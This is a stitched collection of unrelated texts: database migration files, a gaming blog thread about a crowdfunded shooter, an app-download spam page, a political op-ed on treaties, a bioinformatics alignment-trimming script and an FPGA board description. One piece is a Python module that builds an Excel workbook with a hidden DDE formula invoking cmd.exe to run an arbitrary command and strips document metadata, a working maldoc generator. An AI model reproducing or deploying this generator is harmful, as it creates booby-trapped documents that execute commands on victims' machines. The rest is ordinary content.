# Removing M2M table for field events on 'Attendee'
db.delete_table('cert_attendee_events')
models = {
'cert.attendee': {
'Meta': {'object_name': 'Attendee'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '254'}),
'events': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['events.Event']", 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'cert.signature': {
'Meta': {'object_name': 'Signature'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'signature': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '80'})
},
'events.event': {
'Meta': {'object_name': 'Event'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'full_description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'location': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['geo.Location']"}),
'partners': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['events.Partner']", 'null': 'True', 'blank': 'True'}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'signature': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cert.Signature']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'submission_deadline': ('django.db.models.fields.DateTimeField', [], {})
},
'events.partner': {
'Meta': {'object_name': 'Partner'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'geo.location': {
'Meta': {'object_name': 'Location'},
'city': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': "'50'"}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'district': ('django.db.models.fields.CharField', [], {'max_length': "'255'"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'map': ('django.db.models.fields.URLField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'number': ('django.db.models.fields.CharField', [], {'max_length': "'15'"}),
'postal_code': ('django.db.models.fields.CharField', [], {'max_length': "'50'"}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'reference': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': "'50'"}),
'street': ('django.db.models.fields.CharField', [], {'max_length': '255'})
}
}
complete_apps = ['cert']
|
Imagine a game that draws inspiration from the large scale, multiplayer experience of a title such as Battlefield 3, and combines it with the cops and robbers style of Grand Theft Auto and HEAT. Welcome to POLICE WARFARE; a multiplayer first person shooter set in the world of armed robbery and law enforcement. Players will go toe-to-toe as either a member of the Los Angeles Police SWAT team, or the opposite side of the law, robbing banks as an armed gunman.
They had me at HEAT (my all time favorite movie). At the time of writing this they are very far away from their funding goal ($15664/325000), but there is a month left so who knows what could happen if enough people spread the word. I was actually surprised that the other crowd sourced video game I blogged about was 110% funded when it ended!
Lots more details over at the KickStarter website. Make sure you check it out and even put some of your own money in to back the project if you’re interested.
Thoughts? Are you guys excited about these crowdsourced games, or are you happy with what the major game companies are currently delivering?
I’m a little skeptical of this approach to gamemaking, honestly.
It doesn’t matter how good the team producing it is, or whatever their goals really are, but it all seems to come down to how they’re selling it.
That trailer is pretty awesome, yeah, but it only shows their ambitions and defines their target group, but does squat nothing showing what they’ve accomplished so far except for some pretty damn smooth animations and concept models, and proving that they have a pretty decent video editor too.
I want specifics; will it be made on a new engine or an existing one (effectively reducing their budget by a shitload), will it use any kind of physics simulation, will there be customization, etc, etc.
I’m probably just nitpicking though, hahah.
Good points. I think the one advantage is the small amount of overhead these guys have if it’s currently a “spare time” type thing for them. Like you mentioned if they are not using an existing engine (and no doubt paying huge licencing fees) then what are they doing?
It’s a bit both ways for me, to be honest; I’m all for the idea of developers producing games for the gamers that know what they want, but on the other hand things like these have no formal guarantee of making it.
What if they make an awesome game in the end, but miss out on the budget and can’t afford proper servers to host the game?
People wouldn’t get what they “paid” for or funded, and in case the pledge made it they won’t get it back either. Complicated.
I’m not sure it will make it. I don’t see a lot of people outside of US supporting a SWAT sim.
Pretty ambitious to combine all of those elements.
There’s already game that’s been out for a while now called Payday The Heist, that has taken inspiration from Heat. It can be pretty intense, just make sure you play with some friends as it was designed to be a cooperative experience. PC and PS3 I think are the platforms.
i don’t think i want to play a game where i have to shoot family pets.
dangit! Dave beat me to the pets comment.
I like the concept but you know if it gets released its probably going to catch some serious flack for letting people play as bank robbers and shoot cops ala the taliban controversy that Medal of Honor had.
just do the gta police mod. I looks cool but i am not smart enough to have tried it myself.
I didn’t watch the whole video, and I’m not a big gamer. Way back when (on Win98) I had MechWarrior and Battletech, both version 1. I can’t remember which, but in one of the games I was killed almost immediately. I could never play the rest of it, because nothing I could find would let me create a new profile, or try again. The other I played through to the end.
I want to say Battletech was the bad game.
That turned me off to a lot of the FPS market. And that was what I prefer.
would be 100000% dope if they kept as much of the LA county layout.. like.. sunset, and la brea, and stuff… I dunno… I’m down… I love the BF franchise.
|
#!/usr/bin/env python
# encoding: utf-8
# Only enabled on windows
import sys
from collections import OrderedDict
if sys.platform == "win32":
# Download and install pywin32 from https://sourceforge.net/projects/pywin32/files/pywin32/
import win32com.client # @UnresolvedImport
import logging
from modules.excel_gen import ExcelGenerator
from common import utils
class ExcelDDE(ExcelGenerator):
"""
Module used to generate an MS Excel file with a DDE object attack
"""
def run(self):
logging.info(" [+] Generating MS Excel with DDE document...")
try:
# Get command line
paramDict = OrderedDict([("Cmd_Line",None)])
self.fillInputParams(paramDict)
command = paramDict["Cmd_Line"]
logging.info(" [-] Open document...")
# open up an instance of Excel with the win32com driver
excel = win32com.client.Dispatch("Excel.Application")
# do the operation in background without actually opening Excel
#excel.Visible = False
workbook = excel.Workbooks.Open(self.outputFilePath)
logging.info(" [-] Inject DDE field (Answer 'No' to popup)...")
ddeCmd = r"""=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c %s'!A1""" % command.rstrip()
excel.Cells(1, 26).Formula = ddeCmd
excel.Cells(1, 26).FormulaHidden = True
# Remove document information
logging.info(" [-] Remove hidden data and personal info...")
xlRDIAll=99
workbook.RemoveDocumentInformation(xlRDIAll)
logging.info(" [-] Save Document...")
excel.DisplayAlerts=False
excel.Workbooks(1).Close(SaveChanges=1)
excel.Application.Quit()
# garbage collection
del excel
logging.info(" [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath))
except Exception:
logging.exception(" [!] Exception caught!")
logging.error(" [!] Hints: Check if MS office is really closed and Antivirus did not catch the files")
logging.error(" [!] Attempt to force close MS Excel applications...")
objExcel = win32com.client.Dispatch("Excel.Application")
objExcel.Application.Quit()
del objExcel
# If Application.Quit() was not enough, we force kill the process
if utils.checkIfProcessRunning("Excel.exe"):
utils.forceProcessKill("Excel.exe")
|
This Version of 01 high stakes vampiros de las vegas was added on 11-07-2015 in our apps store. It has been downloaded for free by 272 times by our valuable users. Download Latest Version of 01 high stakes vampiros de las vegas for Free. mobile-phones.com.pk is online mobile phone app stock so you come and enjoy unlimited free downloads. Other versions of 01 high stakes vampiros de las vegas may also available in our Mobile App store you can search them from related software category.
Make sure that your mobile phone is compatible for this version of 01 high stakes vampiros de las vegas, Before download 01 high stakes vampiros de las vegas Mobile Phone App you should know about the screen resolution, hardware compatibility of your mobile phone device. If you feel this version is right option for your mobile device then go and download 01 high stakes vampiros de las vegas for absolutely FREE. You can go to Entertainment category for large number of related free downloads. In case of any problem for downloading this version please contact us to solve this problem.
Download Latest Version of 01 high stakes vampiros de las vegas for Free. Mobile Phones is online mobile phone software stock so you come and enjoy unlimited free downloads.
Use our mobile phone app store to download Android apps, phone apps, 01 high stakes vampiros de las vegas, 3D Android games, dialing software, entertainment software, travel apps, medical apps, multimedia apps, and utility apps for absolutely free. Much more is waiting for you, e.g. Skype to chat with your family and friends.
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from pytz import UTC
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Project.updated_on'
db.add_column(u'people_project', 'updated_on',
self.gf('django.db.models.fields.DateTimeField')(auto_now=True, default=datetime.datetime(2013, 7, 1, 0, 0, tzinfo=UTC), blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Project.updated_on'
db.delete_column(u'people_project', 'updated_on')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'july.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'location': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'location_members'", 'null': 'True', 'to': u"orm['people.Location']"}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'picture_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['people.Project']", 'null': 'True', 'blank': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'team_members'", 'null': 'True', 'to': u"orm['people.Team']"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'people.achievedbadge': {
'Meta': {'object_name': 'AchievedBadge'},
'achieved_on': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'badge': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['people.Badge']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['july.User']", 'null': 'True', 'blank': 'True'})
},
u'people.badge': {
'Meta': {'object_name': 'Badge'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '2024', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
},
u'people.commit': {
'Meta': {'ordering': "['-timestamp']", 'object_name': 'Commit'},
'author': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'created_on': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'files': ('jsonfield.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '2024', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['people.Project']", 'null': 'True', 'blank': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['july.User']", 'null': 'True', 'blank': 'True'})
},
u'people.language': {
'Meta': {'object_name': 'Language'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
u'people.location': {
'Meta': {'object_name': 'Location'},
'approved': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'primary_key': 'True'}),
'total': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
u'people.project': {
'Meta': {'object_name': 'Project'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'created_on': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'forked': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'forks': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'parent_url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'repo_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'service': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '30', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'updated_on': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'watchers': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
u'people.team': {
'Meta': {'object_name': 'Team'},
'approved': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'primary_key': 'True'}),
'total': ('django.db.models.fields.IntegerField', [], {'default': '0'})
}
}
complete_apps = ['people']
|
It is ironic that the contemporary discussion concerning American diplomacy should focus on the Paris Climate Accord. Students of history will appreciate that in 1778 the first grand diplomatic debate of our country, over the Treaty of Amity and Commerce, centered on France; that agreement is considered the first cornerstone treaty in American history.
It is important to hearken back to those initial debates because their ghosts haunt our decisions today. The American Congress was wary of such a treaty, even in that desperate year of 1778, because it knew that America’s word had to be binding and that future American foreign policy would henceforward be governed by any such treaty. It is not an accident of history that during both World Wars, the focus of American military policy was the defense and liberation of our oldest ally, France.
It is in this vein that we should reject President Obama’s penchant for actively subverting the treaty process and engaging in dangerous executive agreements that distort the constitutional requirements of Senate approval. This is not to reject altogether the use of executive agreements: Diplomacy is fluid and the expediency of any given time may require the president to utilize executive agreements to protect and promote American vital interests.
However, when such diplomacy is potentially multipresidential, as with the Iran deal (formally known as the Joint Comprehensive Plan of Action, or JCPOA), or multigenerational, as with the Paris Climate Accords, then it is clear from any originalist reading that the Founders intended such commitments to take the form of treaties. Further, treaties create stability and credibility that no executive agreement can ever come near.
Although international relations between nations require both treaties and executive agreements, treaties signal the intent of longevity. They hold any single president and Congress accountable to the past whereby a prior Congress and president spent months, or years, debating the merits of binding American foreign policy down a specific path. They negate the vagaries of any given lapse of judgment and force the American government to do something it often does poorly — look at American interests from a long-term strategic objective. NATO, the Australia, New Zealand, United States Security Treaty, and the mutual security treaties with South Korea and Japan are all clear examples. These treaties, from Presidents Truman to Trump, continue to govern American foreign policy and have created the strongest alliance of western democracies in world history.
In contrast, Mr. Obama engaged in dangerous adventurism through executive decisions designed to subvert the authority of the Senate and the American people. If the Iran deal and the Paris Accords were as important as the previous administration claimed and were the lynchpin of the Obama diplomatic legacy, then why were they not crafted as treaties, sent to the Senate and by that action, allowed the constitutionally proper voice of the American people to be heard?
Concerning the Iran deal, former Secretary of State John Kerry stunned many when he admitted that the reason it was not submitted as a treaty was that the administration knew it would not pass. He also stated, “We’ve been clear from the beginning. We’re not negotiating a ‘legally binding plan.’ We’re negotiating a plan that will have in it a capacity for enforcement.” An administration known for its mental gymnastics receives another gold medal. It has been claimed that one of the reasons the Obama administration engaged in this was for expediency. The Obama administration cited a variety of treaties that the Senate has refused to ratify, notably the Law of the Sea Treaty and the Comprehensive Test Ban Treaty.
In both cases, it is highly questionable if these are advantageous to the United States. But here is the point: The Founders intended bad treaties to be defeated, and they intended that long-lasting diplomacy would be based on treaties and not fiat. Both the Paris Accords and the Iran deal should be required to pass the test for treaties: They commit multiple presidential administrations, they are multigenerational, and they will require America to be a credible partner, even if others are not. America has always rejected the full force of European realism. Every nation knows that if America commits, America keeps its word, but that commitment must be made in a procedurally and constitutionally sound manner.
All that the Obama administration achieved did not enhance American interests, but was a series of calculated moves to shore up the administration’s political base. The Obama administration knew full well that any executive agreement made by any president could be overturned by any future one. Now the situation has been muddied, in part because many of our allies do not fully understand American history, political culture or constitutional law. The United States specifically avoided ad hoc diplomacy during our formative years. Rather, it engaged in hard-nosed diplomacy and only made international agreements after much soul-searching and debate. Foreign policy’s No. 1 currency is credibility. Lose that, and it takes generations for it to return.
Debuting in Fall 2012, The National Security Doctrines of the American Presidency is an unparalleled publication written by one of the nation’s foremost political thinkers, Dr. Lamont C. Colucci: professor of political science, dynamic public speaker, Fulbright Scholar, and former diplomat with the U.S. Department of State. The two-volume work is a comprehensive analysis of the foreign policy and national security doctrines set by U.S. presidents from Washington to Obama.
|
#!/usr/bin/env python
"""Module to align and trim orthologs after the OrthoMCL step."""
from __future__ import division
from Bio import AlignIO
from shared import create_directory, extract_archive_of_files, create_archive_of_files, parse_options, \
CODON_TABLE_ID
from scatterplot import scatterplot
from versions import TRANSLATORX
from operator import itemgetter
from subprocess import check_call, STDOUT
import logging as log
import os
import shutil
import sys
import tempfile
__author__ = "Tim te Beek"
__copyright__ = "Copyright 2011, Netherlands Bioinformatics Centre"
__license__ = "MIT"
def _align_sicos(run_dir, sico_files):
"""Align all SICO files given as argument in parallel and return the resulting alignment files."""
log.info('Aligning {0} SICO genes using TranslatorX & muscle.'.format(len(sico_files)))
# This task is embarrassingly parallel; it runs serially here, but could be multiplexed over a pool of workers
return [_run_translatorx((run_dir, sico_file)) for sico_file in sico_files]
def _run_translatorx((run_dir, sico_file), translation_table=CODON_TABLE_ID):
"""Run TranslatorX to create DNA level alignment file of protein level aligned DNA sequences within sico_file."""
assert os.path.exists(TRANSLATORX) and os.access(TRANSLATORX, os.X_OK), 'Could not find or run ' + TRANSLATORX
# Determine output file name
sico_base = os.path.splitext(os.path.split(sico_file)[1])[0]
alignment_dir = create_directory('alignments/' + sico_base, inside_dir=run_dir)
# Created output file
file_base = os.path.join(alignment_dir, sico_base)
dna_alignment = file_base + '.nt_ali.fasta'
# Actually run the TranslatorX program
command = [TRANSLATORX,
'-i', sico_file,
'-c', str(translation_table),
'-o', file_base]
check_call(command, stdout=open('/dev/null', 'w'), stderr=STDOUT)
assert os.path.isfile(dna_alignment) and 0 < os.path.getsize(dna_alignment), \
'Alignment file should exist and have some content now: {0}'.format(dna_alignment)
return dna_alignment
def _trim_alignments(run_dir, dna_alignments, retained_threshold, max_indel_length, stats_file, scatterplot_file):
"""Trim all DNA alignments using _trim_alignment (singular), and calculate some statistics about the trimming."""
log.info('Trimming {0} DNA alignments from first non-gap codon to last non-gap codon'.format(len(dna_alignments)))
# Create directory here, to prevent race-condition when folder does not exist, but is then created by another process
trimmed_dir = create_directory('trimmed', inside_dir=run_dir)
# Trim all the alignments
trim_tpls = [_trim_alignment((trimmed_dir, dna_alignment, max_indel_length)) for dna_alignment in dna_alignments]
remaining_percts = [tpl[3] for tpl in trim_tpls]
trimmed_alignments = [tpl[0] for tpl in trim_tpls if retained_threshold <= tpl[3]]
misaligned = [tpl[0] for tpl in trim_tpls if retained_threshold > tpl[3]]
# Write trim statistics to file in such a way that they're easily converted to a graph in Galaxy
with open(stats_file, mode='w') as append_handle:
msg = '{0:6} sequence alignments trimmed'.format(len(trim_tpls))
log.info(msg)
append_handle.write('#' + msg + '\n')
average_retained = sum(remaining_percts) / len(remaining_percts)
msg = '{0:5.1f}% sequence retained on average overall'.format(average_retained)
log.info(msg)
append_handle.write('#' + msg + '\n')
filtered = len(misaligned)
msg = '{0:6} orthologs filtered because less than {1}% sequence retained or because of indel longer than {2} '\
.format(filtered, str(retained_threshold), max_indel_length)
log.info(msg)
append_handle.write('#' + msg + '\n')
append_handle.write('# Trimmed file\tOriginal length\tTrimmed length\tPercentage retained\n')
for tpl in sorted(trim_tpls, key=itemgetter(3)):
append_handle.write(os.path.split(tpl[0])[1] + '\t')
append_handle.write(str(tpl[1]) + '\t')
append_handle.write(str(tpl[2]) + '\t')
append_handle.write('{0:.2f}\n'.format(tpl[3]))
# Create scatterplot using trim_tuples
scatterplot(retained_threshold, trim_tpls, scatterplot_file)
return sorted(trimmed_alignments), sorted(misaligned)
def _trim_alignment((trimmed_dir, dna_alignment, max_indel_length)):
"""Trim alignment to retain first & last non-gapped codons across alignment, and everything in between (+gaps!).
Return trimmed file, original length, trimmed length and percentage retained as tuple"""
# Read single alignment from fasta file
alignment = AlignIO.read(dna_alignment, 'fasta')
# print '\n'.join([str(seqr.seq) for seqr in alignment])
# Total alignment should be just as long as first seqr of alignment
alignment_length = len(alignment[0])
# After using protein alignment only for CDS, all alignment lengths should be multiples of three
assert alignment_length % 3 == 0, 'Length not a multiple of three: {0} \n{1}'.format(alignment_length, alignment)
# Assert all codons are either full length codons or gaps, but not a mix of gaps and letters such as AA- or A--
for index in range(0, alignment_length, 3):
for ali in alignment:
codon = ali.seq[index:index + 3]
assert not ('-' in codon and str(codon) != '---'), '{0} at {1} in \n{2}'.format(codon, index, alignment)
# Loop over alignment, taking 3 DNA characters each time, representing a single codon
first_full_codon_start = None
last_full_codon_end = None
for index in range(0, alignment_length, 3):
codon_concatemer = ''.join([str(seqr.seq) for seqr in alignment[:, index:index + 3]])
if '-' in codon_concatemer:
continue
if first_full_codon_start is None:
first_full_codon_start = index
# Update the end on every full codon, so that a single full codon still yields a valid trim span
last_full_codon_end = index + 3
# Create sub alignment consisting of all trimmed sequences from full alignment
trimmed = alignment[:, first_full_codon_start:last_full_codon_end]
trimmed_length = len(trimmed[0])
assert trimmed_length % 3 == 0, 'Length not a multiple of three: {0} \n{1}'.format(trimmed_length, trimmed)
# Write out trimmed alignment file
trimmed_file = os.path.join(trimmed_dir, os.path.split(dna_alignment)[1])
with open(trimmed_file, mode='w') as write_handle:
AlignIO.write(trimmed, write_handle, 'fasta')
# Assert file now exists with content
assert os.path.isfile(trimmed_file) and os.path.getsize(trimmed_file), \
'Expected trimmed alignment file to exist with some content now: {0}'.format(trimmed_file)
# Filter out those alignment that contain an indel longer than N: return zero (0) as trimmed length & % retained
if any('-' * max_indel_length in str(seqr.seq) for seqr in trimmed):
return trimmed_file, alignment_length, 0, 0
return trimmed_file, alignment_length, trimmed_length, trimmed_length / alignment_length * 100
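The trimming rule implemented above can be illustrated on plain strings. A simplified sketch (a toy helper, not part of the pipeline) that keeps everything from the first fully ungapped codon column through the last one, and reports the percentage retained:

```python
def trim_to_full_codons(seqs):
    """Trim aligned, equal-length sequences to the span between the first
    and the last codon column that contains no gap in any sequence."""
    length = len(seqs[0])
    assert length % 3 == 0, 'Length not a multiple of three'
    first = last = None
    for i in range(0, length, 3):
        if '-' in ''.join(s[i:i + 3] for s in seqs):
            continue  # gapped codon column: never a trim boundary
        if first is None:
            first = i  # first fully ungapped codon
        last = i + 3   # end of the most recent fully ungapped codon
    trimmed = [s[first:last] for s in seqs]
    retained = len(trimmed[0]) / length * 100
    return trimmed, retained
```

For example, trimming `['---ATGCCC', 'AAAATGCCC']` keeps columns 3 through 9, retaining two of the three codons; gapped codons in the middle of such a span would be kept, exactly as in `_trim_alignment`.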
def main(args):
"""Main function called when run from command line or as part of pipeline."""
usage = """
Usage: filter_orthologs.py
--orthologs-zip=FILE archive of orthologous genes in FASTA format
--retained-threshold=PERC filter orthologs that retain less than PERC % of sequence after trimming alignment
--max-indel-length=NUMBER filter orthologs that contain insertions / deletions longer than N in middle of alignment
--aligned-zip=FILE destination file path for archive of aligned orthologous genes
--misaligned-zip=FILE destination file path for archive of misaligned orthologous genes
--trimmed-zip=FILE destination file path for archive of aligned & trimmed orthologous genes
--stats=FILE destination file path for ortholog trimming statistics file
--scatterplot=FILE destination file path for scatterplot of retained and filtered sequences by length
"""
options = ['orthologs-zip', 'retained-threshold', 'max-indel-length',
'aligned-zip', 'misaligned-zip', 'trimmed-zip', 'stats', 'scatterplot']
orthologs_zip, retained_threshold, max_indel_length, \
aligned_zip, misaligned_zip, trimmed_zip, target_stats_path, target_scatterplot = \
parse_options(usage, options, args)
# Convert retained threshold to integer, so we can fail fast if argument value format was wrong
retained_threshold = int(retained_threshold)
max_indel_length = int(max_indel_length)
# Run filtering in a temporary folder, to prevent interference from simultaneous runs
run_dir = tempfile.mkdtemp(prefix='align_trim_')
# Extract files from zip archive
temp_dir = create_directory('orthologs', inside_dir=run_dir)
sico_files = extract_archive_of_files(orthologs_zip, temp_dir)
# Align SICOs so all sequences become equal length sequences
aligned_files = _align_sicos(run_dir, sico_files)
# Filter orthologs that retain less than PERC % of sequence after trimming alignment
trimmed_files, misaligned_files = _trim_alignments(run_dir, aligned_files, retained_threshold, max_indel_length,
target_stats_path, target_scatterplot)
# Create archives of files on command line specified output paths
create_archive_of_files(aligned_zip, aligned_files)
create_archive_of_files(misaligned_zip, misaligned_files)
create_archive_of_files(trimmed_zip, trimmed_files)
# Remove unused files to free disk space
shutil.rmtree(run_dir)
# Exit after a comforting log message
log.info('Produced: \n%s', '\n'.join((aligned_zip, misaligned_zip, trimmed_zip,
target_stats_path, target_scatterplot)))
if __name__ == '__main__':
main(sys.argv[1:])
|
Based on Altera’s Stratix IV GX FPGA, BittWare’s 4S-XMC (4SXM) is a single-width XMC, designed to provide powerful FPGA processing and high-speed serial I/O capabilities to VME, VXS, VPX, cPCI, AdvancedTCA, or PCI Express carrier boards. The 4SXM features a high-density, low-power Altera Stratix IV GX FPGA, which was designed specifically for serial I/O-based applications and is PCI SIG compliant for PCI Express Gen1 and Gen2. Four small form-factor pluggable (SFP) compact optical transceivers are available on the front panel. Eight multi-gigabit serial lanes supporting PCI Express, Serial RapidIO, and 10 GigE are available via the board’s rear panel as well as 44 general purpose digital I/O signals. The 4SXM also provides QDRII+ and Flash.
The 4SXM provides four SFP transceivers on the front panel with each transceiver providing support for virtually any serial communication standard, including: Fibre Channel, Gigabit Ethernet, SONET, CPRI, and OBSAI. The four SFP SerDes channels are connected directly to the Stratix IV GX FPGA. A 28-bit SFP control bus is also available to the Stratix IV GX.
The Altera Stratix IV GX was specifically designed for serial I/O-based applications requiring high-density, reconfigurable logic. The Stratix IV GX provides full-duplex, multi-gigabit transceivers, supporting PCI Express (Rev 1.0/2.0), 10 GigE, GigE, Serial RapidIO (Rev 1.0/2.0), and SerialLite II standards, as well as many others.
The 4SXM is compatible with BittWare’s GTV6 or any other standard VME, VXS, VPX, CompactPCI, AdvancedTCA, or PCI Express carrier board equipped with an XMC interface. The board complies with the VITA 42.0 XMC standard, the VITA 42.2 Serial RapidIO standard, and the VITA 42.3 XMC PCI Express Protocol standard. The primary XMC connector (J15) provides 8 SerDes lanes directly to the Stratix IV GX, while XMC J14 provides 44 general-purpose digital I/O signals to the FPGA.
Three reference oscillators are available on the 4SXM. The standard set includes 106.25 MHz for Fibre Channel, 100 MHz for PCI Express, and 156.25 MHz for Serial RapidIO or 10 GigE.
|
